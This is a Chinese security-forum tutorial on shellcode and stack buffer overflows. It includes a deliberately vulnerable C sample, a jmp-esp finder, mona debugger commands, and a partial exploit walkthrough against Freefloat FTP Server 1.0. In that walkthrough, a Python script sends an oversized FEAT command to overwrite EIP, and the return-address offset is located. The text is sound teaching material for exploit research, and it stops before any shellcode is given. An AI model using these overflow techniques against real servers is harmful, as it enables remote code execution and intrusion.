从shellcode学习到缓冲区溢出实战
本文为看雪论坛优秀文章
看雪论坛作者ID:techliu
目录
一、shellcode1.1 简介1.2 缓冲区溢出
- 溢出示例
- 规划缓冲区
1.3 字符串转16进制脚本1.4 几种技巧
- 跳板技术
- 抬高栈顶保护shellcode
二、windbg配置mona2.1 参考2.2 配置符号路径2.3 安装python2.4 配置windbg2.5 常用mona命令
- 显示载入的模块
- 查找机器码
2.6 在Immunity Debugger中使用mona三、Freefloat FTP Server 1.0 溢出漏洞分析3.1 简介3.2 参考3.3 分析工具3.4 Start
- fuzzing
找到覆盖返回地址的偏移
- 利用
3.5 End四、End
一、shellcode
> >>> 1.1 简介
和Exploit的关系?犹如导弹研究者和利用导弹者。
Exploit负责将程序导向shellcode,shellcode又称为payload。通常缓冲区溢出漏洞中可利用shellcode技术。最关键的是如何让程序交出控制权给shellcode。
> >>> 1.2 缓冲区溢出
缓冲区(Buffer)又称为缓存(Cache),是内存空间的一部分。简单理解,可以把它想象成一段栈空间。当一个程序在对缓冲区进行写操作时是很危险的,如果写入的数据超过缓冲区大小则会将缓冲区之外的数据覆盖,造成数据溢出。
溢出示例
shellcode就是利用了缓冲区存放,例如下面这段程序就存在溢出漏洞:
#include <stdio.h>
#include <windows.h>
#define PASSWORD "1234567"
int verify_password (char *password)
int authenticated;
char buffer[44];
authenticated=strcmp(password,PASSWORD);
strcpy(buffer,password);//over flowed here!
return authenticated;
main()
int valid_flag=0;
char password[1024];
FILE * fp;
LoadLibrary("user32.dll");//prepare for messagebox
if(!(fp=fopen("password.txt","rw+")))
exit(0);
fscanf(fp,"%s",password);
valid_flag = verify_password(password);
if(valid_flag)
printf("incorrect password!\n");
printf("Congratulation! You have passed the verification!\n");
fclose(fp);
}
在上面的程序中,verify_password函数中存在大小为44的缓冲区buffer,后面没用做长度校验,直接使用了strcpy进行了填充,导致缓冲区溢出。该程序可通过在password.txt中填充shellcode,通过OD动态调试发现buffer缓冲区之后存放了函数返回地址,只要再把该地址覆盖成shellcode的入口地址就能执行shellcode。
规划缓冲区
在填充shellcode的时候还要合理规划缓冲区,此处shellcode填充在返回地址之前,导致shellcode的大小被限制在44,所以shellcode可以填充在函数返回地址之后。缓冲区中被放的数据可以有以下几种:1. 填充物:一般是nop指令,函数返回地址只要落在该范围内就能顺序到达shellcode位置。2. 被覆盖的返回地址:可以是shellcode入口地址、跳转指令地址、近似到shellcode的nop填充物地址。3. shellcode机器码
摆放方式:
> >>> 1.3 字符串转16进制脚本
str_to_little_endian.py
溢出中的shellcode通常把静态数据(例如字符串)存储到栈中,例如存储“techliu”到栈中:
xor ebx, ebx
push ebx
push 0x0075696C
push 0x68636574
这是根据栈的存储特性以及小端序特性写入到内存中的,这样在内容中就能看到'techliu'的字符串,前两行是将字符串结束符NULL入栈,但是不能直接push 0,因为可能会发生shellcode截断。
而且push只能操作DWORD大小的数据,所以需要对字符串进行切分入栈。
在py脚本后直接跟转化的字符串即可,生成的16进制从下到上依次入栈。
脚本内容:
import struct
import sys
BLOCK = 4
if __name__ == '__main__':
des_str = sys.argv[1]
if not des_str:
print("Not argv[1]!")
exit(0)
if isinstance(des_str, str):
des_str = des_str.encode()
# str_len = len(des_str);
start = 0;
while True:
cur_str = des_str[start:start+4].ljust(4, b'\0')
if cur_str == b'\0\0\0\0':
break
hex_str = cur_str.hex()
int_str = int(hex_str,16)
pack_str = struct.pack(b'<l', int_str)
print("%4s:\t0x%s" % (cur_str.strip(b'\0').decode(), pack_str.hex().upper()))
start = start + 4
except:
print("Error!!")
exit(0)
注:字符串长度如果不是4的倍数,会被填充00,在目标程序读到此处的时候可能会发生00截断,根据目标程序获取exp内容的方式可能还会有其他截断,例如利用fscanf或scanf等,空格(ascii:20)也能截断字符串。
> >>> 1.4 几种技巧
跳板技术
程序每次运行后在内存中的指令地址都是变化的,所以shellcode入口地址也是动态的,所以为了能够动态找到shellcode的位置,引入了跳板技术。
如图所示,左边表示存储返回地址的栈帧填充为shellcode入口地址,这种方式下次运行时入口地址将发生变化导致失败,右边表示跳板技术后,通过esp来定位shellcode,这种方式可保证下次运行exp依然有效。
跳板技术是用来动态跳转shellcode的,shellcode代码需要从函数返回后esp的栈顶位置开始,然后函数返回到JMP ESP指令处,指令执行后跳到esp位置进入shellcode入口。
注: 对于不同的返回指令的不同,函数返回后esp的指向也有所不同。一般执行ret指令后esp+4,此时shellcode放在存放返回地址的栈帧的下一位置。若是ret N指令,执行后esp+4+N,则shellcode需要放在计算出的对应位置处才行。JMP ESP指令的地址要已知,在xp中JMP ESP可以通过加载kernel32.dll、user32.dll、mfc32.dll等这些经常被加载到内存中的库中寻找,一般地址都是确定的。利用C实现查找代码如下:
# include <stdio.h>
#include <windows.h>
main()
HINSTANCE hLib;
hLib = LoadLibrary("user32.dll");
if(!hLib)
printf("Load dll error!\n");
exit(0);
byte* ptr = (byte*) hLib;
int address;
int position;
bool done_flag = false;
for(position=0; !done_flag; position++)
if(ptr[position] == 0xFF && ptr[position+1] == 0xE4)
// jmp esp 的机器码 为 0xFFE4
address = (int)ptr + position;
printf("Find OPcode at 0x%08lX\n", address);
catch(...)
address = (int)ptr + position;
printf("End of 0x%08lX\n", address);
done_flag = true;
}
如果在现在的系统版本上实验,这个程序就失效了,因为WIN7以后, 几个核心dll都是使用浮动地址加载的。
抬高栈顶保护shellcode
如果shellcode放在返回地址栈帧之前,那么在函数返回后栈顶位置会在shellcode下方,虽然出栈后的数据不被清空,但是却会受入栈操作的影响,所以shellcode中若存在push操作,很有可能破坏shellcode结构:
所以要在shellcode开头适当先抬高栈顶让shellcode在栈顶下方,这样push就不会影响shellcode。
抬高栈顶可以用sub esp, N,N大于shellcode长度即可。
[缺失,略过一部分]
二、windbg配置mona
> >>> 2.1 参考
https:// github.com/corelan/wind bglib
https:// github.com/corelan/mona
> >>> 2.2 配置符号路径
新建文件夹,缓存符号,如c:\localsymbols。
然后,写入符号路径:
SRV*c:\localsymbols*http://msdl.microsoft.com/download/symbols
选择reload才能立即生效。
> >>> 2.3 安装python
安装python后才能载入pykd.pyd:
pip install pykd
python版本要和mona版本一致。
> >>> 2.4 配置windbg
将pykd.pyd放入windbg的winext中,mona.py和windbglib.py放入windgb根目录。cmd中执行:
c:
cd "C:\Program Files (x86)\Common Files\Microsoft Shared\VC"
regsvr32 msdia90.dll
(You should get a messagebox indicating that the dll was registered successfully)
根据x64和x86作出相应改变。用windgb随便打开一个pe文件,然后进入命令行,输入.load pykd.pyd,然后输入!py mona,尝试mona运行效果。
> >>> 2.5 常用mona命令
显示载入的模块
!py mona modules
查找机器码
如jmp esp指令。
!py mona.py find -s "\xff\xe4" -m
生成fuzzing模式串:
# 300为模式串长度
!py mona.py pattern_create 300
EIP被模式串覆盖之后,查询模式串偏移:
# 0x41424345为由模式串造成的异常值
!py mona.py pattern_offset 0x41424345
还可以这样查询偏移:
!py mona.py find_msp
> >>> 2.6 在Immunity Debugger中使用mona
将mona.py复制到Immunity Debugger下的PyCommands中,打开Immunity Debugger,输入命令!mona help试用。
三、Freefloat FTP Server 1.0 溢出漏洞分析
> >>> 3.1 简介
这是一道exploit-db中的简单题目,溢出漏洞入门用。
> >>> 3.2 参考
- Part 2: Saved Return Pointer Overflows
- [翻译]Windows Exploit开发系列教程第二部分:Saved Return Pointer Overflows
- Freefloat FTP Server 1.0 溢出漏洞分析
- FreeFloat FTP1.0 溢出漏洞分析
- Buffer Overflows Exploits
> >>> 3.3 分析工具
- mona [项目主页]
- Immunity Debugger [主页]
- IDA 7.0 x86
- win7 x64
- kali 2.0 (主要用msf工具)
- FTPServer.exe 1.0 [主页]
- python 2.7
> >>> 3.4 Start
fuzzing
我试了两种方式,道理一样。
(1)msf方式
打开msfconsole,如果报错:
则可能是postgresql数据库没有启动。
先启动一下。命令systemctl start postgresql。
然后进入msfconsole不报错了就行。
首先搜一下ftp fuzzing的模块,命令search fuzzing。
就用auxiliary/fuzzers/ftp/ftp_pre_post ,命令use auxiliary/fuzzers/ftp/ftp_pre_post
输入info查看信息,RHOST填入即可。
看到2次异常后程序崩溃,应该是可以溢出。
(2)python
写脚本,发包测试:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.80.128', 21))
evil = 'A' * 300
payload = 'FEAT ' + evil + '\r\n'
s.send(payload)
s.close()
运行后,程序出现崩溃。将程序使用Immunity加载运行,再次运行脚本,A的ASCII码为0x41。
可见,程序的EIP已经被0x41414141填充,证明可溢出。(如果反汇编窗口空了,再点一下三角运行程序,就会发生图中报错,或者直接看左下角信息)。
找到覆盖返回地址的偏移
首先,使用Immunity载入ftp程序,让程序运行起来,搜索字符串,找到下面这项:
双击进入反汇编窗口,在这里看到一个wprintfw函数的调用,在此处下断点。
然后利用之前的python脚本发送payload,程序停下之后单步找到造成异常的地方,字啊这里之前的脚本有点bug,单步后并未发现异常,在栈区也没有看到一连串的A,修改脚本,在send之前先recv,再次运行脚本可单步即找到异常点。
注:这里为什么要先recv才能单步走到异常点呢?
我试了试,不放入Immunity中,直接对程序发送payload,会正确触发异常,但是到Immunity中单步就不行了。
通过IDA发现,sub_401020为主窗口过程函数,如果点击了start按钮触发sub_4032D0函数,该函数实现了服务器监听,当有客户端连接时触发sub_403120函数,该函数实现了accept,之后进入sub_402FC0,该函数发送FTP版本信息给客户端,然后使用select与客户端通信。
所以问题的原因就是sub_402FC0这个函数,send和select以及单步调试之间的通信不协调导致。客户端在send之前加上recv先接收服务器发的版本信息才能保证正常进入异常点。经过单步调试之后,找到引起异常的最终位置在sub_402DE0中,在IDA中反汇编代码中分析。
int __thiscall sub_402DE0(SOCKET *this, int a2, const char *a3)
char buf; // [esp+10h] [ebp-100h]
char v5; // [esp+11h] [ebp-FFh]
char v6; // [esp+12h] [ebp-FEh]
char v7; // [esp+13h] [ebp-FDh]
char v8; // [esp+14h] [ebp-FCh]
buf = (char)a2 / 100 + 48;
v7 = 32;
v5 = a2 / 10 % 10 + 48;
v6 = a2 % 10 + 48;
strcpy(&v8, a3);
strcat(&buf, asc_40A588);
return send(*this, &buf, strlen(&buf), 0);
}
可以看到,是这里的strcpy造成的缓冲区溢出。被溢出的缓冲区为v8,大小为0xFC,即252。
通过进一步观察复制到缓冲区中的内容为'客户端发来的数据',前后都有引号包裹,发现了缓冲区的大小,就要想办法找到返回地址的偏移位置。缓冲区布局有两种可能:
这种布局在返回地址和局部变量之间还保存着旧的EBP,新的EBP指向局部变量底部边界。
这种布局局部变量下方直接就是返回地址,EBP指向局部变量底部边界。
判定的方法为:在函数开头观察入栈情况,有push ebp则为前一种布局,否则是后者。
观察该函数的汇编代码,可发现为后者,并没有保存原始ebp。
缓冲区共252,所以对于'FEAT {pattern}',在{pattern}的246处放置跳板地址。
简便方法:使用mona生成模式串。
!mona pattern_create 300
生成后打开pattern.txt复制模式串给py中的evil变量,不建议从log中复制模式串(可能存在截断),然后重启服务器,运行脚本后触发异常。
异常字符0x41326941,查找偏移位置:
!mona pattern_offset 0x41326941
与我们算出来的一模一样。或者!mona findmsp也可以找到
也可以用msf脚本生成:
# 查询脚本位置